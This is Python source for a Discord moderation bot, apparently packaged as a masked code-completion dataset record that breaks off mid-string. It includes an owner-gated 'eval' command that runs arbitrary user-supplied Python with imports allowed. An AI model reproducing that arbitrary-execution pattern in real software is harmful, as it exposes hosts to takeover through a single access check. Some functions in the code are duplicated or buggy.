    # for if statements, we insert returns into the body and the orelse
    if isinstance(body[-1], ast.If):
        insert_returns(body[-1].body)
        insert_returns(body[-1].orelse)
    # for with blocks, again we insert returns into the body
    if isinstance(body[-1], ast.With):
        insert_returns(body[-1].body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
    """Evaluates input.
    Input is interpreted as newline seperated statements.
    If the last statement is an expression, that is the return value.
    Usable globals:
    - `bot`: the bot instance
    - `discord`: the discord module
    - `commands`: the discord.ext.commands module
    - `ctx`: the invokation context
    - `__import__`: the builtin `__import__` function
    Such that `>eval 1 + 1` gives `2` as the result.
    The following invokation will cause the bot to send the text '9'
    to the channel of invokation and return '3' as the result of evaluating
    >eval ```
    a = 1 + 2
    b = a * 2
    await ctx.send(a + b)
    a
    ```
    """
    # SECURITY: this command compiles and executes arbitrary user input.
    # It is safe only because of the hard-coded owner-ID gate below —
    # do not widen this allow-list.
    if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
        await ctx.send("You are not authorized to run this command")
        return
    fn_name = "_eval_expr"
    # Strip the code-block backticks users wrap their snippet in.
    cmd = cmd.strip("` ")
    # add a layer of indentation
    cmd = "\n".join(f"    {i}" for i in cmd.splitlines())
    # wrap in async def body
    body = f"async def {fn_name}():\n{cmd}"
    parsed = ast.parse(body)
    body = parsed.body[0].body
    # Make the snippet's final expression the coroutine's return value.
    insert_returns(body)
    env = {
        'bot': ctx.bot,
        'discord': discord,
        'commands': commands,
        'ctx': ctx,
        '__import__': __import__
    }
    # Define the wrapper coroutine inside `env`, then call it by name.
    exec(compile(parsed, filename="<ast>", mode="exec"), env)
    result = (await eval(f"{fn_name}()", env))
    await ctx.send(result)
# LABEL: Debugging Commands
@bot.command(name="data")
async def data(ctx):
    """Debug command: upload the raw data.json file (bot owner / dev only)."""
    authorized = await bot.is_owner(ctx.author)
    if not authorized and ctx.author.id != 733532987794128897:  # for real sparta
        return
    await ctx.send(file=discord.File("data.json"))
@bot.event
async def on_message(message: discord.Message):
    """Per-message pipeline: prefix hint on bare mention, AFK tracking,
    F-to-pay-respects, and the link/attachment auto-moderation filter.
    """
    global previous_msg_sender_id
    if message.author.bot:
        return
    author: discord.Member = message.author
    channel: discord.TextChannel = message.channel
    guild: discord.Guild = message.guild
    await bot.process_commands(message)
    if str(guild.id) not in Data.server_data:
        Data.server_data[str(guild.id)] = Data.create_new_data()
    data = Data.server_data[str(guild.id)]

    # A bare mention of the bot answers with this guild's prefix.
    if message.content.replace('!', '') == bot.user.mention:
        pre = data["prefix"]
        await channel.send(f"The prefix in this server is `{pre}`")

    # BUG FIX: iterate over a snapshot — entries may be removed mid-loop,
    # and the original mutated the list it was iterating.
    for afk_user_entry in list(data["afks"]):
        afk_user_id = int(afk_user_entry["user"])
        afk_reason = afk_user_entry["reason"]
        afk_user = guild.get_member(afk_user_id)
        if afk_user is None:
            # BUG FIX: member left the guild while AFK; the original
            # crashed with AttributeError on afk_user.id here.
            continue
        # AFK clears only on the user's second consecutive message.
        if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
            Data.server_data[str(guild.id)]["afks"].remove(afk_user_entry)
            await channel.send(f"**{afk_user}** is no longer AFK.")
        elif afk_user in message.mentions:
            await channel.send(f"**{afk_user}** is currently AFK because **{afk_reason}**.")

    if data["pay_respects"] and message.content.strip().lower() == "f":
        await channel.send(f"**{author.display_name}** has paid their respects...")

    # Auto-mod filter: active guild, author and channel not whitelisted,
    # and the author is not an administrator.
    if data["active"] and str(author.id) not in data["users"]:
        if not str(channel.id) in data["channels"]:
            perms = author.permissions_in(channel)
            if not perms.administrator:
                if "http://" in message.content or "https://" in message.content:
                    # BUG FIX: data["urls"] is treated as an allow-list
                    # (TODO confirm against the AutoMod cog). The original
                    # purged and warned once per NON-matching whitelist
                    # entry; a message should only be removed when it
                    # matches none of the allowed URLs.
                    if not any(url in message.content for url in data["urls"]):
                        await channel.purge(limit=1)
                        warning = await channel.send(
                            f"{author.mention}, you are not allowed to send links in this channel.")
                        await asyncio.sleep(3)
                        await warning.delete()
                elif len(message.attachments) > 0:
                    await channel.purge(limit=1)
                    warning = await channel.send(
                        f"{author.mention}, you are not allowed to send attachments in this channel.")
                    await asyncio.sleep(3)
                    await warning.delete()
    previous_msg_sender_id = author.id
bot.run(TOKEN)
|
flexible
|
{
"blob_id": "4f9729e396e01cb3d6c9011f79a1ebe618a8e762",
"index": 7787,
"step-1": "<mask token>\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n data = Data.server_data[str(message.guild.id)]\n return data['prefix']\n\n\n<mask token>\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\n<mask token>\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print('Bot is ready...')\n\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}'\n )\n\n\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}')\n\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has joined {guild} server...')\n join_role = guild.get_role(data['join_role'])\n if join_role is not None:\n await member.add_roles(join_role)\n if data['welcome_msg'] is None:\n server_wlcm_msg = (\n f'Welcome, {member.mention}, to the Official **{guild.name}** Server'\n )\n else:\n server_wlcm_msg = data['welcome_msg']\n server_wlcm_msg = server_wlcm_msg.replace('[mention]',\n f'{member.mention}')\n wel_channel = None\n if data['welcome_channel'] is None:\n for channel in channels:\n if str(channel).find('welcome') != -1:\n wel_channel = channel\n break\n else:\n wel_channel = 
guild.get_channel(int(data['welcome_channel']))\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print('DEBUG: No welcome channel has been set or found.')\n\n\n@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has left the {guild.name}...')\n if data['leave_msg'] is None:\n server_leave_msg = (\n f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'\n )\n else:\n server_leave_msg = data['leave_msg']\n server_leave_msg = server_leave_msg.replace('[member]', f'{member}')\n lv_channel = None\n if data['leave_channel'] is None:\n for channel in channels:\n if str(channel).find('bye') != -1 or str(channel).find('leave'\n ) != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data['leave_channel']))\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print('DEBUG: No leave channel has been set or found.')\n\n\n@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n\n@bot.event\nasync def 
on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f'Error {type(error)}: {error}')\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n embed = discord.Embed(title='Error!', description=\n 'An unexpected error ocurred. 
Please report this to the dev.'\n )\n embed.add_field(name='Error Message:', value=\n f'{type(error)}:\\n{error}', inline=False)\n await ctx.send(f'{error}')\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send('You are not authorized to run this command')\n return\n fn_name = '_eval_expr'\n cmd = cmd.strip('` ')\n cmd = '\\n'.join(f' {i}' for i in cmd.splitlines())\n body = f'async def {fn_name}():\\n{cmd}'\n parsed = ast.parse(body)\n body = parsed.body[0].body\n insert_returns(body)\n env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':\n ctx, '__import__': __import__}\n exec(compile(parsed, filename='<ast>', mode='exec'), env)\n result = await eval(f'{fn_name}()', env)\n await ctx.send(result)\n\n\n@bot.command(name='data')\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897:\n data_file = discord.File('data.json')\n await 
ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n if message.author.bot:\n return\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n await bot.process_commands(message)\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n if message.content.replace('!', '') == bot.user.mention:\n pre = data['prefix']\n await channel.send(f'The prefix in this server is `{pre}`')\n for afk_user_entry in data['afks']:\n afk_user_id = int(afk_user_entry['user'])\n afk_reason = afk_user_entry['reason']\n afk_user = guild.get_member(afk_user_id)\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)\n await channel.send(f'**{afk_user}** is no longer AFK.')\n elif afk_user in message.mentions:\n await channel.send(\n f'**{afk_user}** is currently AFK because **{afk_reason}**.')\n if data['pay_respects'] and message.content.strip().lower() == 'f':\n await channel.send(\n f'**{author.display_name}** has paid their respects...')\n if data['active'] and str(author.id) not in data['users']:\n if not str(channel.id) in data['channels']:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if ('http://' in message.content or 'https://' in message.\n content):\n if len(data['urls']) > 0:\n for url in data['urls']:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(3)\n await msg2.delete()\n elif len(message.attachments) > 
0:\n await channel.purge(limit=1)\n msg3 = await channel.send(\n f'{author.mention}, you are not allowed to send attachments in this channel.'\n )\n await asyncio.sleep(3)\n await msg3.delete()\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-3": "<mask token>\nTOKEN = os.getenv('SPARTA_TOKEN')\nintents = discord.Intents.default()\nintents.members = True\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n data = Data.server_data[str(message.guild.id)]\n return data['prefix']\n\n\nPREFIX = get_prefix\nbot = commands.Bot(command_prefix=PREFIX, description=\n 'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',\n intents=intents, help_command=None, case_insensitive=True)\nTHEME_COLOR = discord.Colour.blue()\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\nprevious_msg_sender_id = None\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print('Bot is ready...')\n\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}'\n )\n\n\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}')\n\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has joined {guild} server...')\n join_role = guild.get_role(data['join_role'])\n if join_role is not None:\n await member.add_roles(join_role)\n if data['welcome_msg'] is None:\n server_wlcm_msg = (\n f'Welcome, {member.mention}, to the Official 
**{guild.name}** Server'\n )\n else:\n server_wlcm_msg = data['welcome_msg']\n server_wlcm_msg = server_wlcm_msg.replace('[mention]',\n f'{member.mention}')\n wel_channel = None\n if data['welcome_channel'] is None:\n for channel in channels:\n if str(channel).find('welcome') != -1:\n wel_channel = channel\n break\n else:\n wel_channel = guild.get_channel(int(data['welcome_channel']))\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print('DEBUG: No welcome channel has been set or found.')\n\n\n@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has left the {guild.name}...')\n if data['leave_msg'] is None:\n server_leave_msg = (\n f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'\n )\n else:\n server_leave_msg = data['leave_msg']\n server_leave_msg = server_leave_msg.replace('[member]', f'{member}')\n lv_channel = None\n if data['leave_channel'] is None:\n for channel in channels:\n if str(channel).find('bye') != -1 or str(channel).find('leave'\n ) != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data['leave_channel']))\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print('DEBUG: No leave channel has been set or found.')\n\n\n@bot.command(name='remove_leave', aliases=['rleave', 
'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f'Error {type(error)}: {error}')\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n embed = discord.Embed(title='Error!', description=\n 'An unexpected error ocurred. 
Please report this to the dev.'\n )\n embed.add_field(name='Error Message:', value=\n f'{type(error)}:\\n{error}', inline=False)\n await ctx.send(f'{error}')\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send('You are not authorized to run this command')\n return\n fn_name = '_eval_expr'\n cmd = cmd.strip('` ')\n cmd = '\\n'.join(f' {i}' for i in cmd.splitlines())\n body = f'async def {fn_name}():\\n{cmd}'\n parsed = ast.parse(body)\n body = parsed.body[0].body\n insert_returns(body)\n env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':\n ctx, '__import__': __import__}\n exec(compile(parsed, filename='<ast>', mode='exec'), env)\n result = await eval(f'{fn_name}()', env)\n await ctx.send(result)\n\n\n@bot.command(name='data')\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897:\n data_file = discord.File('data.json')\n await 
ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n if message.author.bot:\n return\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n await bot.process_commands(message)\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n if message.content.replace('!', '') == bot.user.mention:\n pre = data['prefix']\n await channel.send(f'The prefix in this server is `{pre}`')\n for afk_user_entry in data['afks']:\n afk_user_id = int(afk_user_entry['user'])\n afk_reason = afk_user_entry['reason']\n afk_user = guild.get_member(afk_user_id)\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)\n await channel.send(f'**{afk_user}** is no longer AFK.')\n elif afk_user in message.mentions:\n await channel.send(\n f'**{afk_user}** is currently AFK because **{afk_reason}**.')\n if data['pay_respects'] and message.content.strip().lower() == 'f':\n await channel.send(\n f'**{author.display_name}** has paid their respects...')\n if data['active'] and str(author.id) not in data['users']:\n if not str(channel.id) in data['channels']:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if ('http://' in message.content or 'https://' in message.\n content):\n if len(data['urls']) > 0:\n for url in data['urls']:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(\n f'{author.mention}, you are not allowed to send links in this channel.'\n )\n await asyncio.sleep(3)\n await msg2.delete()\n elif len(message.attachments) > 
0:\n await channel.purge(limit=1)\n msg3 = await channel.send(\n f'{author.mention}, you are not allowed to send attachments in this channel.'\n )\n await asyncio.sleep(3)\n await msg3.delete()\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-4": "import os\nimport subprocess\nimport discord\nimport asyncio\nimport traceback\nimport sys\nimport ast\nfrom discord.ext import commands\nfrom cogs.misc import Miscellaneous\nfrom cogs.serversettings import ServerSettings\nfrom cogs.mod import Moderator\nfrom cogs.automod import AutoMod\nfrom cogs.google import Google\nfrom cogs.fun import Fun\nfrom otherscipts.helpers import update_presence\nfrom otherscipts.data import Data\nTOKEN = os.getenv('SPARTA_TOKEN')\nintents = discord.Intents.default()\nintents.members = True\n\n\ndef get_prefix(client, message):\n if str(message.guild.id) not in Data.server_data:\n Data.server_data[str(message.guild.id)] = Data.create_new_data()\n data = Data.server_data[str(message.guild.id)]\n return data['prefix']\n\n\nPREFIX = get_prefix\nbot = commands.Bot(command_prefix=PREFIX, description=\n 'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',\n intents=intents, help_command=None, case_insensitive=True)\nTHEME_COLOR = discord.Colour.blue()\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\nprevious_msg_sender_id = None\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print('Bot is ready...')\n\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}'\n )\n\n\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(\n f'Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}')\n\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n 
if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has joined {guild} server...')\n join_role = guild.get_role(data['join_role'])\n if join_role is not None:\n await member.add_roles(join_role)\n if data['welcome_msg'] is None:\n server_wlcm_msg = (\n f'Welcome, {member.mention}, to the Official **{guild.name}** Server'\n )\n else:\n server_wlcm_msg = data['welcome_msg']\n server_wlcm_msg = server_wlcm_msg.replace('[mention]',\n f'{member.mention}')\n wel_channel = None\n if data['welcome_channel'] is None:\n for channel in channels:\n if str(channel).find('welcome') != -1:\n wel_channel = channel\n break\n else:\n wel_channel = guild.get_channel(int(data['welcome_channel']))\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print('DEBUG: No welcome channel has been set or found.')\n\n\n@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n print(f'{member} has left the {guild.name}...')\n if data['leave_msg'] is None:\n server_leave_msg = (\n f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'\n )\n else:\n server_leave_msg = data['leave_msg']\n server_leave_msg = server_leave_msg.replace('[member]', f'{member}')\n lv_channel = None\n if data['leave_channel'] is None:\n for channel in channels:\n if 
str(channel).find('bye') != -1 or str(channel).find('leave'\n ) != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data['leave_channel']))\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print('DEBUG: No leave channel has been set or found.')\n\n\n@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f'Error {type(error)}: {error}')\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n embed = discord.Embed(title='Error!', description=\n 'An unexpected error ocurred. 
Please report this to the dev.'\n )\n embed.add_field(name='Error Message:', value=\n f'{type(error)}:\\n{error}', inline=False)\n await ctx.send(f'{error}')\n\n\ndef insert_returns(body):\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send('You are not authorized to run this command')\n return\n fn_name = '_eval_expr'\n cmd = cmd.strip('` ')\n cmd = '\\n'.join(f' {i}' for i in cmd.splitlines())\n body = f'async def {fn_name}():\\n{cmd}'\n parsed = ast.parse(body)\n body = parsed.body[0].body\n insert_returns(body)\n env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':\n ctx, '__import__': __import__}\n exec(compile(parsed, filename='<ast>', mode='exec'), env)\n result = await eval(f'{fn_name}()', env)\n await ctx.send(result)\n\n\n@bot.command(name='data')\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897:\n data_file = discord.File('data.json')\n await 
